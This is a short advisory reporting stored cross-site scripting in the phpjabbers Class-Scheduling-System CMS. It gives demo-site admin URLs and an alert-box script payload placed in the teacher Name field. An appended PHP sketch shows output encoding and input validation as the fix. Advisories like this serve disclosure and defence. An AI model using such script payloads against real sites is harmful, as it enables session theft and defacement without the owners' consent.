Class-Scheduling-System CMS - XSS Vulnerability

2017.12.28
Credit: 9aylas
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##################################################################
* Title  : Class-Scheduling-System CMS - XSS Vulnerability
* Author : 9aylas
* Dork   : N/A
* Vendor : https://www.phpjabbers.com/class-scheduling-system/
##################################################################

Exploit :

1) Demo :

#Admin panel :
http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdmin&action=pjActionIndex

#Update teacher : ( Add or Edit ) as you like
http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdminTeachers&action=pjActionUpdate&id=5

Edit the Name Box to :
test<script>alert('Xss3d')</script>

Save and check it here :
http://demo.phpjabbers.com/1514375108_185/index.php?controller=pjAdminTeachers&action=pjActionIndex&err=AT01

We see the Xss3d alert ^^

~EOF

~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ghosty - AX302 - Redwan Red - Zahir - TheHappyBit - DebAAkrem
Bellal - Hacker-Fire - Ramel - And all DzCyberSec ^_^ ...
Welcome Back indouskha ;D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

https://cxsecurity.com/ - 27-12-2017
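The stored value fires because the teacher list writes the saved name into the page without encoding it. The sketch below is an added example, not code from the vendor's product or from the advisory author: it shows a list row rendered with and without output encoding, plus a server-side name check on save. All function names and the row layout are hypothetical, and the sample rows are constructed (the second reuses the name value quoted above).

```php
<?php
// Added example; hypothetical names, not code from the vendor's product.
declare(strict_types=1);

/** Before: the value read from storage is concatenated straight into markup. */
function renderTeacherRowUnsafe(array $teacher): string
{
    return '<tr><td>' . $teacher['name'] . '</td></tr>';
}

/** Encode a value for an HTML text node or a quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** After: every stored field is encoded at the point of output. */
function renderTeacherRowSafe(array $teacher): string
{
    $name = e($teacher['name']);
    return '<tr><td title="' . $name . '">' . $name . '</td></tr>';
}

/**
 * Defence in depth on save: accept only letters, marks, digits, spaces and
 * a few punctuation characters, 1 to 100 characters long. This complements
 * output encoding; it does not replace it.
 */
function validateTeacherName(string $name): bool
{
    return preg_match('/^[\p{L}\p{M}\p{N} .,\'-]{1,100}\z/u', $name) === 1;
}

// Constructed sample rows; the second is the name value from the advisory.
$rows = [
    ['name' => "Anne O'Neil"],
    ['name' => "test<script>alert('Xss3d')</script>"],
];

foreach ($rows as $row) {
    printf("valid:  %s\n", validateTeacherName($row['name']) ? 'yes' : 'no');
    printf("unsafe: %s\n", renderTeacherRowUnsafe($row));
    printf("safe:   %s\n\n", renderTeacherRowSafe($row));
}
```

Encoding belongs at output, per context, because values already stored before a validation rule was introduced still reach the list view.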

